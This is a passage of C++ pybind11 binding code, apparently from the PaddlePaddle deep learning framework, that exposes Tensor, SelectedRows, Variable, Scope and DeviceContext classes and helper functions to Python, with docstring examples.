m.def("from_dlpack", [](py::capsule *dltensor) {
DLManagedTensor *dmt = reinterpret_cast<DLManagedTensor *>(
PyCapsule_GetPointer(dltensor->ptr(), "dltensor"));
PADDLE_ENFORCE_NOT_NULL(
dmt, platform::errors::InvalidArgument(
"from_dlpack received an invalid capsule. "
"Note that a DLPack tensor can be consumed only once."));
PyCapsule_SetName(dltensor->ptr(), "used_dltensor");
DLTensor dl = dmt->dl_tensor;
framework::Tensor tensor;
if (dl.device.device_type == kDLCPU) {
paddle::framework::TensorFromDLPack(dl, &tensor);
}
#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP)
if (dl.device.device_type == kDLGPU) {
paddle::framework::TensorFromDLPack(dl, &tensor);
}
#endif
return tensor;
});
m.def("_create_loaded_parameter",
[](const py::handle &vec_var_list, const Scope &scope,
const Executor *executor) {
CreateVariableIfNotExit(vec_var_list, scope, executor);
});
m.def("save_op_version_info", [](framework::ProgramDesc &desc) {
framework::compatible::pb::OpVersionMap pb_vmap{desc.OpVersionMap()};
framework::compatible::SaveOpVersions(
framework::compatible::OpVersionRegistrar::GetInstance()
.GetVersionMap(),
&pb_vmap);
});
m.def("set_printoptions", [](const py::kwargs &kwargs) {
auto &print_opt = framework::PrintOptions::Instance();
if (kwargs.contains("precision")) {
print_opt.precision = kwargs["precision"].cast<int>();
}
if (kwargs.contains("threshold")) {
print_opt.threshold = kwargs["threshold"].cast<int>();
}
if (kwargs.contains("edgeitems")) {
print_opt.edgeitems = kwargs["edgeitems"].cast<int>();
}
if (kwargs.contains("linewidth")) {
print_opt.linewidth = kwargs["linewidth"].cast<int>();
}
if (kwargs.contains("sci_mode")) {
print_opt.sci_mode = kwargs["sci_mode"].cast<bool>();
}
VLOG(4) << "Set printoptions: precision=" << print_opt.precision
<< ", threshold=" << print_opt.threshold
<< ", edgeitems=" << print_opt.edgeitems
<< ", linewidth=" << print_opt.linewidth
<< ", sci_mode=" << print_opt.sci_mode;
});
m.def("broadcast_shape", [](const std::vector<int64_t> &x_dim,
const std::vector<int64_t> &y_dim) {
return phi::vectorize(operators::details::BroadcastTwoDims(
phi::make_ddim(x_dim), phi::make_ddim(y_dim), -1));
});
m.def(
"_append_python_callable_object_and_return_id",
[](py::object py_obj) -> size_t {
return paddle::operators::AppendPythonCallableObjectAndReturnId(py_obj);
});
m.def("_get_use_default_grad_op_desc_maker_ops",
[] { return OpInfoMap::Instance().GetUseDefaultGradOpDescMakerOps(); });
m.def("_get_all_register_op_kernels",
[](const std::string &lib) {
std::unordered_map<std::string, std::vector<std::string>>
all_kernels_info;
if (lib == "fluid" || lib == "all") {
auto &all_kernels =
paddle::framework::OperatorWithKernel::AllOpKernels();
for (auto &kernel_pair : all_kernels) {
auto op_type = kernel_pair.first;
std::vector<std::string> kernel_types;
for (auto &info_pair : kernel_pair.second) {
paddle::framework::OpKernelType kernel_type = info_pair.first;
kernel_types.emplace_back(
paddle::framework::KernelTypeToString(kernel_type));
}
all_kernels_info.emplace(op_type, kernel_types);
}
}
if (lib == "phi" || lib == "all") {
auto phi_kernels = phi::KernelFactory::Instance().kernels();
for (auto &kernel_pair : phi_kernels) {
auto op_type = phi::TransToFluidOpName(kernel_pair.first);
std::vector<std::string> kernel_types;
for (auto &info_pair : kernel_pair.second) {
framework::OpKernelType kernel_type =
framework::TransPhiKernelKeyToOpKernelType(info_pair.first);
auto kernel_type_str =
framework::KernelTypeToString(kernel_type);
if (all_kernels_info.count(op_type)) {
if (std::find(all_kernels_info[op_type].begin(),
all_kernels_info[op_type].end(),
kernel_type_str) ==
all_kernels_info[op_type].end()) {
all_kernels_info[op_type].emplace_back(kernel_type_str);
}
} else {
kernel_types.emplace_back(kernel_type_str);
}
}
if (!kernel_types.empty()) {
all_kernels_info.emplace(op_type, kernel_types);
}
}
}
return all_kernels_info;
},
py::arg("lib") = "all",
R"DOC(
Return the registered kernels in paddle.
Args:
lib[string]: the libarary, could be 'phi', 'fluid' and 'all'.
)DOC");
// NOTE(zjl): ctest would load environment variables at the beginning even
// though we have not `import paddle.fluid as fluid`. So we add this API
// to enable eager deletion mode in unittest.
m.def("_set_eager_deletion_mode", &paddle::framework::SetEagerDeletionMode);
m.def("_set_fuse_parameter_group_size",
&paddle::framework::ir::SetFuseParameterGroupsSize);
m.def("_set_fuse_parameter_memory_size",
&paddle::framework::ir::SetFuseParameterMemorySize);
m.add_object("_cleanup",
py::capsule([]() { ScopePool::Instance().Clear(); }));
m.def("_set_paddle_lib_path", &paddle::platform::dynload::SetPaddleLibPath);
m.def("_promote_types_if_complex_exists",
&paddle::framework::PromoteTypesIfComplexExists);
py::class_<framework::Tensor> framework_tensor(m, "Tensor",
py::buffer_protocol());
g_framework_tensor_pytype =
reinterpret_cast<PyTypeObject *>(framework_tensor.ptr());
framework_tensor
.def("__array__",
[](framework::Tensor &self) { return TensorToPyArray(self); })
.def("_ptr",
[](const framework::Tensor &self) {
return reinterpret_cast<uintptr_t>(self.data());
})
.def("_is_initialized",
[](const framework::Tensor &self) { return self.IsInitialized(); })
.def("_get_dims",
[](const framework::Tensor &self) { return vectorize(self.dims()); })
.def("_set_dims",
[](framework::Tensor &self, const std::vector<int64_t> &dim) {
self.Resize(phi::make_ddim(dim));
})
.def("_set_layout",
[](framework::Tensor &self, const std::string &layout) {
self.set_layout(StringToDataLayout(layout));
})
.def("_alloc_float",
[](framework::Tensor &self, paddle::platform::CUDAPlace &place) {
self.mutable_data<float>(place);
})
.def("_alloc_float",
[](framework::Tensor &self, paddle::platform::XPUPlace &place) {
self.mutable_data<float>(place);
})
.def("_alloc_float",
[](framework::Tensor &self, paddle::platform::CPUPlace &place) {
self.mutable_data<float>(place);
})
.def("_alloc_float",
[](framework::Tensor &self, paddle::platform::NPUPlace &place) {
self.mutable_data<float>(place);
})
.def("_alloc_float",
[](framework::Tensor &self, paddle::platform::MLUPlace &place) {
self.mutable_data<float>(place);
})
.def("_alloc_double",
[](framework::Tensor &self, paddle::platform::CPUPlace &place) {
self.mutable_data<double>(place);
})
.def("_alloc_int",
[](framework::Tensor &self, paddle::platform::CPUPlace &place) {
self.mutable_data<int>(place);
})
.def("_alloc_int",
[](framework::Tensor &self, paddle::platform::XPUPlace &place) {
self.mutable_data<int>(place);
})
.def("_alloc_int",
[](framework::Tensor &self, paddle::platform::CUDAPlace &place) {
self.mutable_data<int>(place);
})
.def("_alloc_int",
[](framework::Tensor &self, paddle::platform::MLUPlace &place) {
self.mutable_data<int>(place);
})
.def("_alloc_int",
[](framework::Tensor &self,
paddle::platform::CUDAPinnedPlace &place) {
self.mutable_data<int>(place);
})
.def("_alloc_float",
[](framework::Tensor &self,
paddle::platform::CUDAPinnedPlace &place) {
self.mutable_data<float>(place);
})
.def("_mutable_data",
[](framework::Tensor &self, paddle::platform::CPUPlace &place,
paddle::framework::proto::VarType::Type type) {
return reinterpret_cast<uintptr_t>(
self.mutable_data(place, framework::TransToPhiDataType(type)));
})
.def("_mutable_data",
[](framework::Tensor &self, paddle::platform::XPUPlace &place,
paddle::framework::proto::VarType::Type type) {
return reinterpret_cast<uintptr_t>(
self.mutable_data(place, framework::TransToPhiDataType(type)));
})
.def("_mutable_data",
[](framework::Tensor &self, paddle::platform::CUDAPlace &place,
paddle::framework::proto::VarType::Type type) {
return reinterpret_cast<uintptr_t>(
self.mutable_data(place, framework::TransToPhiDataType(type)));
})
.def("_mutable_data",
[](framework::Tensor &self, paddle::platform::CUDAPinnedPlace &place,
paddle::framework::proto::VarType::Type type) {
return reinterpret_cast<uintptr_t>(
self.mutable_data(place, framework::TransToPhiDataType(type)));
})
.def("_mutable_data",
[](framework::Tensor &self, paddle::platform::MLUPlace &place,
paddle::framework::proto::VarType::Type type) {
return reinterpret_cast<uintptr_t>(
self.mutable_data(place, framework::TransToPhiDataType(type)));
})
.def("_clear", &framework::Tensor::clear)
.def("_mutable_data",
[](framework::Tensor &self, paddle::platform::NPUPlace &place,
paddle::framework::proto::VarType::Type type) {
return reinterpret_cast<uintptr_t>(
self.mutable_data(place, framework::TransToPhiDataType(type)));
})
.def("_copy_from", &TensorCopyFrom<paddle::platform::CPUPlace>,
py::arg("tensor"), py::arg("place"), py::arg("batch_size") = -1)
.def("_copy_from", &TensorCopyFrom<paddle::platform::XPUPlace>,
py::arg("tensor"), py::arg("place"), py::arg("batch_size") = -1)
.def("_copy_from", &TensorCopyFrom<paddle::platform::CUDAPlace>,
py::arg("tensor"), py::arg("place"), py::arg("batch_size") = -1)
.def("_copy_from", &TensorCopyFrom<paddle::platform::NPUPlace>,
py::arg("tensor"), py::arg("place"), py::arg("batch_size") = -1)
.def("_copy_from", &TensorCopyFrom<paddle::platform::CUDAPinnedPlace>,
py::arg("tensor"), py::arg("place"), py::arg("batch_size") = -1)
.def("_copy_from", &TensorCopyFrom<paddle::platform::MLUPlace>,
py::arg("tensor"), py::arg("place"), py::arg("batch_size") = -1)
.def("_copy_from", &TensorCopyFrom<paddle::platform::Place>,
py::arg("tensor"), py::arg("place"), py::arg("batch_size") = -1)
.def("set", SetTensorFromPyArray<paddle::platform::CPUPlace>,
py::arg("array"), py::arg("place"), py::arg("zero_copy") = false)
.def("set", SetTensorFromPyArray<paddle::platform::XPUPlace>,
py::arg("array"), py::arg("place"), py::arg("zero_copy") = false)
.def("set", SetTensorFromPyArray<paddle::platform::CUDAPlace>,
py::arg("array"), py::arg("place"), py::arg("zero_copy") = false)
.def("set", SetTensorFromPyArray<paddle::platform::NPUPlace>,
py::arg("array"), py::arg("place"), py::arg("zero_copy") = false)
.def("set", SetTensorFromPyArray<paddle::platform::IPUPlace>,
py::arg("array"), py::arg("place"), py::arg("zero_copy") = false)
.def("set", SetTensorFromPyArray<paddle::platform::MLUPlace>,
py::arg("array"), py::arg("place"), py::arg("zero_copy") = false)
.def("set", SetTensorFromPyArray<paddle::platform::CUDAPinnedPlace>,
py::arg("array"), py::arg("place"), py::arg("zero_copy") = false,
R"DOC(
Set the data of Tensor on place with given numpy array.
Args:
lod (numpy.ndarray): The data to set.
place (CPUPlace|CUDAPlace|XPUPlace|IPUPlace|CUDAPinnedPlace|NPUPlace|MLUPlace): The place where the
Tensor is to be set.
zero_copy (bool, optional): Whether to share memory with the input numpy array.
This parameter only works with CPUPlace. Default: False.
Returns:
None.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
t = fluid.Tensor()
t.set(np.ndarray([5, 30]), fluid.CPUPlace())
)DOC")
.def("shape",
[](framework::Tensor &self) { return vectorize(self.dims()); },
R"DOC(
Return the shape of Tensor.
Returns:
list[int]: The shape of Tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
t = fluid.Tensor()
t.set(np.ndarray([5, 30]), fluid.CPUPlace())
print(t.shape()) # [5, 30]
)DOC")
.def("_to_dlpack",
[](framework::Tensor &self) {
DLPackTensor dlpack_tensor(self, 1);
DLManagedTensor *dmt = dlpack_tensor.ToDLManagedTensor();
auto capsule = py::capsule(
static_cast<void *>(dmt), "dltensor", [](PyObject *ptr) {
if (ptr) {
auto dltensor = new DLManagedTensor;
try {
dltensor = reinterpret_cast<DLManagedTensor *>(
PyCapsule_GetPointer(ptr, "used_dltensor"));
return;
} catch (...) {
dltensor = reinterpret_cast<DLManagedTensor *>(
PyCapsule_GetPointer(ptr, "dltensor"));
}
dltensor->deleter(dltensor);
}
});
return capsule;
})
.def("_set_float_element", TensorSetElement<float>)
.def("_get_float_element", TensorGetElement<float>)
.def("_set_double_element", TensorSetElement<double>)
.def("_get_double_element", TensorGetElement<double>)
.def("_place", [](framework::Tensor &self) { return self.place(); })
.def("_dtype",
[](framework::Tensor &self) {
return framework::TransToProtoVarType(self.type());
})
.def("_layout",
[](framework::Tensor &self) {
return DataLayoutToString(self.layout());
})
.def("_share_data_with", &framework::Tensor::ShareDataWith)
.def("__getitem__", PySliceTensor, py::return_value_policy::reference)
.def("__str__",
[](const framework::Tensor &self) {
std::stringstream ostr;
ostr << self;
return ostr.str();
}) /* ------ End of original Tensor ------ */
.def(
"__init__",
[](framework::Tensor &instance, const std::vector<std::vector<size_t>>
&recursive_sequence_lengths) {
LoD new_lod;
new_lod.reserve(recursive_sequence_lengths.size());
std::copy(recursive_sequence_lengths.begin(),
recursive_sequence_lengths.end(),
std::back_inserter(new_lod));
LoD new_offset_lod = ConvertToOffsetBasedLoD(new_lod);
PADDLE_ENFORCE_EQ(
CheckLoD(new_offset_lod, -1), true,
platform::errors::InvalidArgument(
"The provided recursive_sequence_lengths info is "
"invalid, "
"the LoD converted by recursive_sequence_lengths is %s",
new_lod));
new (&instance) framework::Tensor(new_offset_lod);
})
.def("__init__",
[](framework::Tensor &instance) {
new (&instance) framework::Tensor();
})
// We implement offset based LOD in C++ while we use length based with
// Python API. So we changed set_lod to set_recursive_sequence_lengths
// to
// avoid misuse.
// The discussion is here:
// https://github.com/PaddlePaddle/Paddle/issues/10855
.def("set_lod",
[](framework::Tensor &self,
const std::vector<std::vector<size_t>> &lod) {
// the input lod is offset-based level-of-detail info
LoD new_lod;
new_lod.reserve(lod.size());
std::copy(lod.begin(), lod.end(), std::back_inserter(new_lod));
PADDLE_ENFORCE_EQ(
CheckLoD(new_lod, vectorize(self.dims()).front()), true,
platform::errors::InvalidArgument(
"The provided LoD is invalid, the LoD is %s", new_lod));
self.set_lod(new_lod);
},
py::arg("lod"), R"DOC(
Set LoD of the Tensor.
Args:
lod (list[list[int]]): The lod to set.
Returns:
None.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
t = fluid.Tensor()
t.set(np.ndarray([5, 30]), fluid.CPUPlace())
t.set_lod([[0, 2, 5]])
print(t.lod()) # [[0, 2, 5]]
)DOC")
.def("set_recursive_sequence_lengths",
[](framework::Tensor &self, const std::vector<std::vector<size_t>>
&recursive_sequence_lengths) {
// the input recursive_sequence_lengths is length-based
// level-of-detail info
LoD new_lod;
new_lod.reserve(recursive_sequence_lengths.size());
std::copy(recursive_sequence_lengths.begin(),
recursive_sequence_lengths.end(),
std::back_inserter(new_lod));
LoD new_offset_lod = ConvertToOffsetBasedLoD(new_lod);
PADDLE_ENFORCE_EQ(
CheckLoD(new_offset_lod, vectorize(self.dims()).front()), true,
platform::errors::InvalidArgument(
"The provided recursive_sequence_lengths info is "
"invalid, "
"the LoD converted by recursive_sequence_lengths is "
"%s",
new_lod));
self.set_lod(new_offset_lod);
},
py::arg("recursive_sequence_lengths"), R"DOC(
Set LoD of the Tensor according to recursive sequence lengths.
For example, if recursive_sequence_lengths=[[2, 3]], which means
there are two sequences with length 2 and 3 respectively, the
corresponding lod would be [[0, 2, 2+3]], i.e., [[0, 2, 5]].
Args:
recursive_sequence_lengths (list[list[int]]): The recursive sequence lengths.
Returns:
None.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
t = fluid.Tensor()
t.set(np.ndarray([5, 30]), fluid.CPUPlace())
t.set_recursive_sequence_lengths([[2, 3]])
print(t.recursive_sequence_lengths()) # [[2, 3]]
print(t.lod()) # [[0, 2, 5]]
)DOC")
.def("lod",
[](framework::Tensor &self) -> std::vector<std::vector<size_t>> {
// output the offset-based lod info
LoD lod = self.lod();
std::vector<std::vector<size_t>> new_lod;
new_lod.reserve(lod.size());
std::copy(lod.begin(), lod.end(), std::back_inserter(new_lod));
return new_lod;
},
R"DOC(
Return the LoD of the Tensor.
Returns:
list[list[int]]: The lod of the Tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
t = fluid.Tensor()
t.set(np.ndarray([5, 30]), fluid.CPUPlace())
t.set_lod([[0, 2, 5]])
print(t.lod()) # [[0, 2, 5]]
)DOC")
// Set above comments of set_lod.
.def("recursive_sequence_lengths",
[](framework::Tensor &self) -> std::vector<std::vector<size_t>> {
// output the length-based lod info
LoD lod = phi::ConvertToLengthBasedLoD(self.lod());
std::vector<std::vector<size_t>> new_lod;
new_lod.reserve(lod.size());
std::copy(lod.begin(), lod.end(), std::back_inserter(new_lod));
return new_lod;
},
R"DOC(
Return the recursive sequence lengths corresponding to of the LodD
of the Tensor.
Returns:
list[list[int]]: The recursive sequence lengths.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
t = fluid.Tensor()
t.set(np.ndarray([5, 30]), fluid.CPUPlace())
t.set_recursive_sequence_lengths([[2, 3]])
print(t.recursive_sequence_lengths()) # [[2, 3]]
)DOC")
.def("has_valid_recursive_sequence_lengths",
[](framework::Tensor &self) -> bool {
// Check that the lod info is valid and match the outermost
// dimension of the Tensor data
return CheckLoD(self.lod(), vectorize(self.dims()).front());
},
R"DOC(
Check whether the LoD of the Tensor is valid.
Returns:
bool: Whether the LoD is valid.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
t = fluid.Tensor()
t.set(np.ndarray([5, 30]), fluid.CPUPlace())
t.set_recursive_sequence_lengths([[2, 3]])
print(t.has_valid_recursive_sequence_lengths()) # True
)DOC")
.def("_as_type",
[](const framework::Tensor &self,
paddle::framework::proto::VarType::Type type) {
framework::Tensor dst;
if (self.IsInitialized() && self.numel() > 0) {
TransDataType(self, type, &dst);
}
return dst;
})
.def("_copy",
[](const framework::Tensor &self, const platform::Place &place) {
// follow fetch_op's inplementation
framework::Tensor dst;
if (self.IsInitialized() && self.numel() > 0) {
TensorCopySync(self, place, &dst);
} else {
// Not copy, if the src tensor is empty.
dst.clear();
dst.Resize({0});
}
dst.set_lod(self.lod());
return dst;
#ifdef _WIN32
});
#else
})
.def(py::pickle(
[](const framework::Tensor &t) { // __getstate__
auto holder = t.Holder();
PADDLE_ENFORCE_EQ(platform::is_cpu_place(holder->place()), true,
platform::errors::PreconditionNotMet(
"Tensor is not on CPU."
"Now only Tensor on CPU can be serialized."));
auto *mmap_writer_allocation =
dynamic_cast<memory::allocation::MemoryMapWriterAllocation *>(
holder.get());
PADDLE_ENFORCE_NOT_NULL(
mmap_writer_allocation,
platform::errors::PreconditionNotMet(
"Tensor is not in shared memory."
"Now only Tensor on shared memory can be serialized."));
int type_idx = static_cast<int>(t.type());
return py::make_tuple(mmap_writer_allocation->ipc_name(),
mmap_writer_allocation->size(), type_idx,
vectorize(t.dims()), t.lod());
},
[](py::tuple t) { // __setstate__
if (t.size() != 5)
throw std::runtime_error("Invalid Tensor state!");
// 1. Create a new C++ instance
framework::Tensor tensor;
// 2. Rebuild Allocation
const std::string &ipc_name = t[0].cast<std::string>();
size_t size = t[1].cast<size_t>();
auto shared_reader_holder =
memory::allocation::RebuildMemoryMapReaderAllocation(ipc_name,
size);
// 3. Maintain global fd set
VLOG(3) << "Tensor ipc name: " << ipc_name;
memory::allocation::MemoryMapFdSet::Instance().Insert(ipc_name);
// 4. Rebuild Tensor
tensor.ResetHolderWithType(
shared_reader_holder,
static_cast<paddle::experimental::DataType>(t[2].cast<int>()));
tensor.Resize(phi::make_ddim(t[3].cast<std::vector<int>>()));
tensor.set_lod(t[4].cast<framework::LoD>());
return tensor;
}));
#endif
py::class_<phi::SelectedRows>(m, "SelectedRows")
.def("__init__",
[](phi::SelectedRows &instance) {
new (&instance) phi::SelectedRows();
})
.def("__init__",
[](phi::SelectedRows &instance, const std::vector<int64_t> rows,
const int64_t &height) {
new (&instance) phi::SelectedRows(rows, height);
})
.def("get_tensor",
[](phi::SelectedRows &self) { return self.mutable_value(); },
py::return_value_policy::reference)
.def("numel",
[](phi::SelectedRows &self) -> int64_t {
return self.value().numel();
})
.def("set_height", &phi::SelectedRows::set_height)
.def("height", &phi::SelectedRows::height)
.def("set_rows",
[](phi::SelectedRows &self, std::vector<int64_t> rows) {
#if !defined(PADDLE_WITH_CUDA) && !defined(PADDLE_WITH_HIP)
self.set_rows(rows);
#else
Vector<int64_t> new_rows(rows);
self.set_rows(new_rows);
#endif
})
.def("sync_index",
[](phi::SelectedRows &instance) { instance.SyncIndex(); })
.def("rows", [](phi::SelectedRows &self) {
auto rows = self.rows();
std::vector<int64_t> new_rows;
new_rows.reserve(rows.size());
std::copy(rows.begin(), rows.end(), std::back_inserter(new_rows));
return new_rows;
});
py::class_<Variable>(m, "Variable", R"DOC(Variable Class.
All parameter, weight, gradient are variables in Paddle.
)DOC")
.def(py::init<>())
.def("is_int", [](const Variable &var) { return var.IsType<int>(); })
.def("set_int",
[](Variable &var, int val) -> void { *var.GetMutable<int>() = val; })
.def("get_int", [](const Variable &var) -> int { return var.Get<int>(); })
.def("is_float", [](const Variable &var) { return var.IsType<float>(); })
.def("set_float",
[](Variable &var, float val) -> void {
*var.GetMutable<float>() = val;
})
.def("get_float",
[](const Variable &var) -> float { return var.Get<float>(); })
.def("get_tensor",
[](Variable &self) -> LoDTensor * {
return self.GetMutable<LoDTensor>();
},
py::return_value_policy::reference)
.def("get_bytes",
[](Variable &self) {
return py::bytes(*self.GetMutable<std::string>());
})
.def("set_string_list",
[](Variable &self, Strings str_list) {
*self.GetMutable<Strings>() = str_list;
})
.def("set_vocab", [](Variable &self,
Vocab vocab) { *self.GetMutable<Vocab>() = vocab; })
.def("get_string_tensor",
[](Variable &self) { return self.GetMutable<Strings>(); },
py::return_value_policy::reference)
.def("get_map_tensor",
[](Variable &self) { return self.GetMutable<Vocab>(); },
py::return_value_policy::reference)
.def("get_lod_rank_table",
[](Variable &self) { return self.GetMutable<LoDRankTable>(); },
py::return_value_policy::reference)
.def("get_selected_rows",
[](Variable &self) -> phi::SelectedRows * {
return self.GetMutable<phi::SelectedRows>();
},
py::return_value_policy::reference)
.def("get_lod_tensor_array",
[](Variable &self) { return self.GetMutable<LoDTensorArray>(); },
py::return_value_policy::reference)
.def("get_fetch_list",
[](Variable &self) { return self.GetMutable<FetchList>(); },
py::return_value_policy::reference)
#if defined(PADDLE_WITH_NCCL) || defined(PADDLE_WITH_RCCL)
.def("get_communicator",
[](Variable &self) -> platform::Communicator * {
return self.GetMutable<platform::Communicator>();
},
py::return_value_policy::reference)
#endif
.def("get_reader",
[](Variable &self) -> framework::ReaderHolder * {
PADDLE_ENFORCE_EQ(
self.IsType<framework::ReaderHolder>(), true,
platform::errors::InvalidArgument(
"The variable is not type of ReaderHolder."));
return self.GetMutable<framework::ReaderHolder>();
},
py::return_value_policy::reference)
.def("get_scope",
[](Variable &self) -> Scope * {
auto scope_vec =
self.GetMutable<std::vector<framework::Scope *>>();
PADDLE_ENFORCE_GT(
scope_vec->size(), 0,
platform::errors::InvalidArgument(
"The size of scope_vec should be greater than 0"));
return scope_vec->front();
},
py::return_value_policy::reference)
.def("set_scope", [](Variable &self, Scope &scope) {
auto scope_vec = self.GetMutable<std::vector<framework::Scope *>>();
scope_vec->emplace_back(&scope);
});
BindReader(&m);
py::class_<Scope>(m, "_Scope", R"DOC(
Scope is an association of a name to Variable. All variables belong to Scope.
Variables in a parent scope can be retrieved from local scope.
You need to specify a scope to run a Net, i.e., `exe.Run(&scope)`.
One net can run in different scopes and update different variable in the
scope.
You can create var in a scope and get it from the scope.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# create tensor from a scope and set value to it.
param = scope.var('Param').get_tensor()
param_array = np.full((height, row_numel), 5.0).astype("float32")
param.set(param_array, place)
)DOC")
.def("_remove_from_pool",
[](Scope &self) { ScopePool::Instance().Remove(&self); })
.def("var",
[](Scope &self, const std::string &name) -> Variable * {
return self.Var(name);
},
py::arg("name"),
R"DOC(
Find or create variable named :code:`name` in the current scope.
If the variable named :code:`name` does not exist in the
current scope, the variable would be created. Otherwise,
return the existing variable.
Args:
name (str): the variable name.
Returns:
out (core.Variable): the found or created variable.
)DOC",
py::return_value_policy::reference)
.def("find_var", &Scope::FindVar, py::arg("name"),
R"DOC(
Find variable named :code:`name` in the current scope or
its parent scope. Return None if not found.
Args:
name (str): the variable name.
Returns:
out (core.Variable|None): the found variable or None.
)DOC",
py::return_value_policy::reference)
.def("erase", &Scope::EraseVars, py::arg("names"),
R"DOC(
Find variable named :code:`name` in the current scope or
its parent scope. Return None if not found.
Args:
name (str): the variable names to be erase.
Returns:
None
)DOC",
py::return_value_policy::reference)
.def("new_scope", [](Scope &self) -> Scope * { return &self.NewScope(); },
R"DOC(
Create a new sub-scope of the current scope.
Returns:
out (core._Scope): the created sub-scope.
)DOC",
py::return_value_policy::reference)
.def("drop_kids", &Scope::DropKids,
R"DOC(
Delete all sub-scopes of the current scope.
)DOC")
.def("_kids", &Scope::kids);
m.def("Scope",
[]() -> Scope * {
auto *s = new Scope();
ScopePool::Instance().Insert(std::unique_ptr<Scope>(s));
return s;
},
R"DOC(
Create a new scope.
Returns:
out (core._Scope): the created scope.
)DOC",
py::return_value_policy::reference);
//! @note: Be careful! PyBind will return std::string as an unicode, not
//! Python str. If you want a str object, you should cast them in Python.
m.def("get_all_op_protos", []() -> std::vector<py::bytes> {
std::vector<py::bytes> ret_values;
for (auto &iter : OpInfoMap::Instance().map()) {
auto &info = iter.second;
if (info.HasOpProtoAndChecker()) {
std::string str;
PADDLE_ENFORCE_EQ(
info.Proto().SerializeToString(&str), true,
platform::errors::Fatal(
"Serialize OpProto Error. This could be a bug of Paddle."));
ret_values.emplace_back(str);
}
}
return ret_values;
});
m.def("get_op_attrs_default_value",
[](py::bytes byte_name) -> paddle::framework::AttributeMap {
std::string op_type = byte_name;
paddle::framework::AttributeMap res;
auto info = OpInfoMap::Instance().GetNullable(op_type);
if (info != nullptr) {
if (info->HasOpProtoAndChecker()) {
auto op_checker = info->Checker();
res = op_checker->GetDefaultAttrsMap();
}
}
return res;
});
m.def(
"get_grad_op_desc", [](const OpDesc &op_desc,
const std::unordered_set<std::string> &no_grad_set,
const std::vector<BlockDesc *> &grad_sub_block) {
std::unordered_map<std::string, std::string> grad_to_var;
std::vector<std::unique_ptr<OpDesc>> grad_op_descs =
framework::OpInfoMap::Instance()
.Get(op_desc.Type())
.GradOpMaker()(op_desc, no_grad_set, &grad_to_var,
grad_sub_block);
std::vector<OpDesc *> grad_op_desc_ptrs(grad_op_descs.size());
std::transform(grad_op_descs.begin(), grad_op_descs.end(),
grad_op_desc_ptrs.begin(),
[](std::unique_ptr<OpDesc> &p) { return p.release(); });
return std::make_pair(grad_op_desc_ptrs, grad_to_var);
});
m.def("has_grad_op_maker", [](const std::string op_type) {
return framework::OpInfoMap::Instance().Get(op_type).HasGradOpMaker();
});
m.def("has_non_empty_grad_op_maker", [](const std::string op_type) {
return framework::OpInfoMap::Instance()
.Get(op_type)
.HasNonEmptyGradOpMaker();
});
m.def("has_infer_inplace", [](const std::string op_type) {
return framework::OpInfoMap::Instance().Get(op_type).HasInferInplace();
});
m.def("infer_no_need_buffer_slots",
[](const std::string op_type, const framework::VariableNameMap &inputs,
const framework::VariableNameMap &outputs,
const framework::AttributeMap &attrs) {
auto infer_func = framework::OpInfoMap::Instance()
.Get(op_type)
.NoNeedBufferVarsInferer();
if (infer_func) {
return infer_func(inputs, outputs, attrs);
} else {
std::unordered_set<std::string> empty = {};
return empty;
}
});
m.def("prune", [](const ProgramDesc &origin,
const std::set<std::string> &feeded_var_names,
const std::vector<std::array<size_t, 2>> &targets) {
ProgramDesc prog_with_targets(origin);
for (const auto &t : targets) {
prog_with_targets.MutableBlock(t[0])->Op(t[1])->SetIsTarget(true);
}
proto::ProgramDesc pruned_desc;
auto pruned_origin_block_id_map =
Prune(*prog_with_targets.Proto(), feeded_var_names, &pruned_desc);
return std::make_tuple(ProgramDesc(pruned_desc),
pruned_origin_block_id_map);
});
m.def("prune_backward",
[](const framework::ProgramDesc &program) {
return PruneBackward(program);
},
R"DOC(
Prune the backward part of a program, mostly called in
program.clone(for_test=True).
Args:
program (ProgramDesc): The original program.
Returns:
tuple(ProgramDesc, map<int, int>): The first part is
the pruned program desc, and the second part is a map
which contains the id pair of pruned block and corresponding
origin block.
)DOC");
m.def("empty_var_name",
[]() { return std::string(framework::kEmptyVarName); });
m.def("grad_var_suffix",
[]() { return std::string(framework::kGradVarSuffix); });
m.def_submodule(
"var_names",
"The module will return special predefined variable name in Paddle")
.def("empty", []() { return kEmptyVarName; })
.def("temp", []() { return kTempVarName; });
// clang-format off
py::class_<paddle::platform::DeviceContext>(m, "DeviceContext")
.def_static("create",
[](paddle::platform::CPUPlace& place)
-> paddle::platform::DeviceContext* {
auto* context = new paddle::platform::CPUDeviceContext();
context->SetAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetAllocator(place)
.get());
context->SetHostAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetAllocator(paddle::platform::CPUPlace())
.get());
context->SetZeroAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetZeroAllocator(place)
.get());
return context;
})
.def_static("create",
[](paddle::platform::XPUPlace& place)
-> paddle::platform::DeviceContext* {
#ifndef PADDLE_WITH_XPU
PADDLE_THROW(
platform::errors::PermissionDenied(
"Cannot use XPUPlace in CPU/GPU version, "
"Please recompile or reinstall Paddle with XPU support."));
#else
auto* context = new paddle::platform::XPUDeviceContext(place);
context->SetAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetAllocator(place)
.get());
context->SetHostAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetAllocator(paddle::platform::CPUPlace())
.get());
context->SetZeroAllocator(
paddle::memory::allocation::AllocatorFacade::Instance()
.GetZeroAllocator(place)
.get());
return context;
#endif
})
.def_static("create",
[](paddle::platform::MLUPlace& place)
-> paddle::platform::DeviceContext* {
#ifndef PADDLE_WITH_MLU
PADDLE_THROW(
platform::errors::PermissionDenied(
"Cannot use MLUPlace in CPU/GPU version, "
"Please recompile or reinstall Paddle with MLU support."));
#else
return new paddle::platform::MLUDeviceContext(place);
#endif
})
.def_static("create",
[](paddle::platform::NPUPlace& place)
-> paddle::platform::DeviceContext* {
#ifndef PADDLE_WITH_ASCEND_CL
